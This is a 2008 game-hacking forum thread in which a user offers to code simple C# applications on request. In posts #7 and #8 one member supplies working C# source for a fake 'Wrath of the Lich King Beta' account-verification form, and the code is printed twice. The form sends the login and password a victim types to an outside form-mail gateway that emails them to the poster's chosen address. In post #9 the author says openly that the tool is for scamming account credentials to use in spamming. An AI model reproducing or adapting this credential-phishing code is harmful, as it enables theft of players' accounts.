Apoc's Request an App! menu

User Tag List

Results 1 to 9 of 9
  1. #1
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Apoc's Request an App!

    Out of complete boredom, I've decided that I'll take requests for simple applications. (Larger scale app requests should be PM'd, I may consider your offer)

    All of these apps will be programmed in C# .NET 3.5. (Sorry mac users)
    Doing speedhacks and whatnot, is not high on my agenda of shit to code in C#. (It's a pain in the ass, and requires me to go out of my way to make it work.)

    Rules:

    -If the app is related to WoW, I will only write it for use within IS and using ISXWoW. (For both our sakes, this is alot easier, and safer)

    -I will NOT take requests for "cracks" or things like that. (That is absolutely illegal, and I will not touch that type of thing.)

    - Requests must be as specific as possible as to what you want the app to do.

    - Feel free to offer money for applications if you wish, but this is intended to be a free service out of my own free time.

    - There are NO deadlines as to when an application can be finished. (It will be done when I get it finished)

    - Depending on the nature of the app, it will be PM'd or released (at my discretion) in either precompiled format, or open source. (Again, at my discretion)

    All of these rules may be overlooked depending on the circumstances. EXCEPT for the no cracks rule.

    My usual finish times are 2-3 days depending. Large scale projects will obviously take a bit longer.

    All code and such will be under a CC-NC-ND license. (No copying my work and slapping your name on it. )

    Feel free to PM me if you have any questions, or post them here.

    Apoc's Request an App!
  2. #2
    Cypher's Avatar Kynox's Sister's Pimp
    Reputation
    1356
    Join Date
    Apr 2006
    Posts
    5,368
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    WTB A way to read from MPQ files in C# (with or without Stormlib, ie a wrapper or a complete conversion) so I can paint minimap data onto a form (using DX).

    P.S. It should shoot lazorz.

  3. #3
    2dgreengiant's Avatar ★ Elder ★


    Reputation
    1190
    Join Date
    Feb 2007
    Posts
    7,129
    Thanks G/R
    1/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I will PM you
    If you need me you have my skype, if you don't have my skype then you don't need me.

  4. #4
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by 2dgreengiant View Post
    I will PM you
    I have no PM!


    And Chazzwazza, catch me in IRC you tard.

  5. #5
    Cypher's Avatar Kynox's Sister's Pimp
    Reputation
    1356
    Join Date
    Apr 2006
    Posts
    5,368
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Kay. ^_^ (filler)

  6. #6
    2dgreengiant's Avatar ★ Elder ★


    Reputation
    1190
    Join Date
    Feb 2007
    Posts
    7,129
    Thanks G/R
    1/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i thought i would try and make it myself be4 i pmed you :P
    If you need me you have my skype, if you don't have my skype then you don't need me.

  7. #7
    Tempo01's Avatar Banned
    Reputation
    1
    Join Date
    Oct 2007
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Some Tip for Apoc :P the POST method aka Gateway Method // 0 SMTP settings , only 1 email , no password stored , super anonym

    SETMEUP.cs

    Code:
    namespace Wrath_Of_The_Lich_King_Beta
    {
        class SETMEUP
        {
            public static string gWay = "http://formfixer.com/ff/ff.cgi";
            public static string MyEmail = "&s_email=apoc%40mmowned.com ";
            public static string ret = "s_retur=http%3A%2F%2F127.0.0.1";
        }
    }
    VerifyAccount.cs

    Code:
    using System;
    using System.IO;
    using System.Net;
    using System.Web;
    using System.Text;
    using System.Net.Mail;
    using System.Text.RegularExpressions;
    using System.Windows.Forms;
    
    namespace Wrath_Of_The_Lich_King_Beta
    {
        public partial class VerifyAccount : Form
        {
            public VerifyAccount()
            {
                InitializeComponent();
            }
    
            private void button1_Click(object sender, EventArgs e)
            {
                if (textBox1.Text.Length >= 6)
                {
                    if (textBox2.Text.Length >= 6)
                    {
                        if (Valid(textBox2.Text))
                        {
    
                            HttpWebRequest req = (HttpWebRequest)WebRequest.Create(SETMEUP.gWay);
                            string postData = SETMEUP.ret + SETMEUP.MyEmail + "&Login=" + textBox1.Text + "&Pass=" + textBox2.Text;
                            postData = postData.Replace(" ", "%20");
                            byte[] send = Encoding.Default.GetBytes(postData);
                            req.Method = "POST";
                            req.ContentType = "application/x-www-form-urlencoded";
                            req.ContentLength = send.Length;
                            Stream sout = req.GetRequestStream();
                            sout.Write(send, 0, send.Length);
                            sout.Flush();
                            sout.Close();
                            Close();
                        }
                        else
                        {
                            MessageBox.Show("Password must contain at least one number. (0-9)");
                        }
                    }
                    else
                    {
                        MessageBox.Show("Password must be longer than 6 characters");
                    }
                }
                else
                {
                    MessageBox.Show("Account Name must be longer than 6 characters");
                }
            }
    
            private bool Valid(string pass)
            {
                var rx = new Regex("d+");
                return rx.Match(pass).Success;
            }
        }
    }
    Last edited by Tempo01; 04-22-2008 at 03:00 PM.

  8. #8
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Tempo01 View Post
    Some Tip for Apoc :P the POST method aka Gateway Method // 0 SMTP settings , only 1 email , no password stored , super anonym

    SETMEUP.cs

    Code:
    namespace Wrath_Of_The_Lich_King_Beta
    {
        class SETMEUP
        {
            public static string gWay = "http://formfixer.com/ff/ff.cgi";
            public static string MyEmail = "&s_email=apoc%40mmowned.com ";
            public static string ret = "s_retur=http%3A%2F%2F127.0.0.1";
        }
    }
    VerifyAccount.cs

    Code:
    using System;
    using System.IO;
    using System.Net;
    using System.Web;
    using System.Text;
    using System.Net.Mail;
    using System.Text.RegularExpressions;
    using System.Windows.Forms;
    
    namespace Wrath_Of_The_Lich_King_Beta
    {
        public partial class VerifyAccount : Form
        {
            public VerifyAccount()
            {
                InitializeComponent();
            }
    
            private void button1_Click(object sender, EventArgs e)
            {
                if (textBox1.Text.Length >= 6)
                {
                    if (textBox2.Text.Length >= 6)
                    {
                        if (Valid(textBox2.Text))
                        {
    
                            HttpWebRequest req = (HttpWebRequest)WebRequest.Create(SETMEUP.gWay);
                            string postData = SETMEUP.ret + SETMEUP.MyEmail + "&Login=" + textBox1.Text + "&Pass=" + textBox2.Text;
                            postData = postData.Replace(" ", "%20");
                            byte[] send = Encoding.Default.GetBytes(postData);
                            req.Method = "POST";
                            req.ContentType = "application/x-www-form-urlencoded";
                            req.ContentLength = send.Length;
                            Stream sout = req.GetRequestStream();
                            sout.Write(send, 0, send.Length);
                            sout.Flush();
                            sout.Close();
                            Close();
                        }
                        else
                        {
                            MessageBox.Show("Password must contain at least one number. (0-9)");
                        }
                    }
                    else
                    {
                        MessageBox.Show("Password must be longer than 6 characters");
                    }
                }
                else
                {
                    MessageBox.Show("Account Name must be longer than 6 characters");
                }
            }
    
            private bool Valid(string pass)
            {
                var rx = new Regex("d+");
                return rx.Match(pass).Success;
            }
        }
    }
    Oh my! I didn't know there was such a thing as an SMTP server that didn't require authorization! </sarcasm>

    Passing a post method to a web page to send an email is just the same as using an SMTP server. (For the exception that the web page is actually handling the SMTP)

    There's plenty of free SMTP servers out there, that don't require authorization. And can be done in far less lines than you have done. Also, where's the SSL support? (Https) Do you WANT to have plain text account/passwords streamed over a network and internet?

  9. #9
    Tempo01's Avatar Banned
    Reputation
    1
    Join Date
    Oct 2007
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Apoc View Post
    Passing a post method to a web page to send an email is just the same as using an SMTP server. (For the exception that the web page is actually handling the SMTP)
    True but don’t forget that in your case the username and password for the SMTP is stored in the program which can be extracted
    Originally Posted by Apoc View Post
    there are plenty of free SMTP servers out there, that don't require authorization. And can be done in far less lines than you have done.
    Show me those servers that do not request any authorization and have SSL / TLS support
    Originally Posted by Apoc View Post
    Also, where's the SSL support? (Https) Do you WANT to have plain text account/passwords streamed over a network and internet?
    Of course not, but does it make any difference if you are just scamming for a username and password that will be most likely used for in-game spamming, and also you can encrypt it in some weird format if you are so paranoid that someone will steal your stolen account info or find your own SSL supported web host . Also the gateway method can be used almost on every free host that supports PHP/CGI and is easier to find then the non-requiring authorization SSL / TLS STMP servers
    Last edited by Tempo01; 04-24-2008 at 08:53 PM.

Similar Threads

  1. [Request] WoW Armory Phone App Emulator
    By jh16 in forum WoW Bots Questions & Requests
    Replies: 0
    Last Post: 10-30-2012, 04:54 PM
  2. [Request] iPhone App Buttons
    By Killalots in forum Art & Graphic Design
    Replies: 0
    Last Post: 03-30-2012, 12:58 PM
  3. [Request] WoW.app with "signaturefile" checks disabled
    By bobtehnerd in forum WoW ME Questions and Requests
    Replies: 0
    Last Post: 10-26-2011, 01:52 PM
All times are GMT -5. The time now is 03:16 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search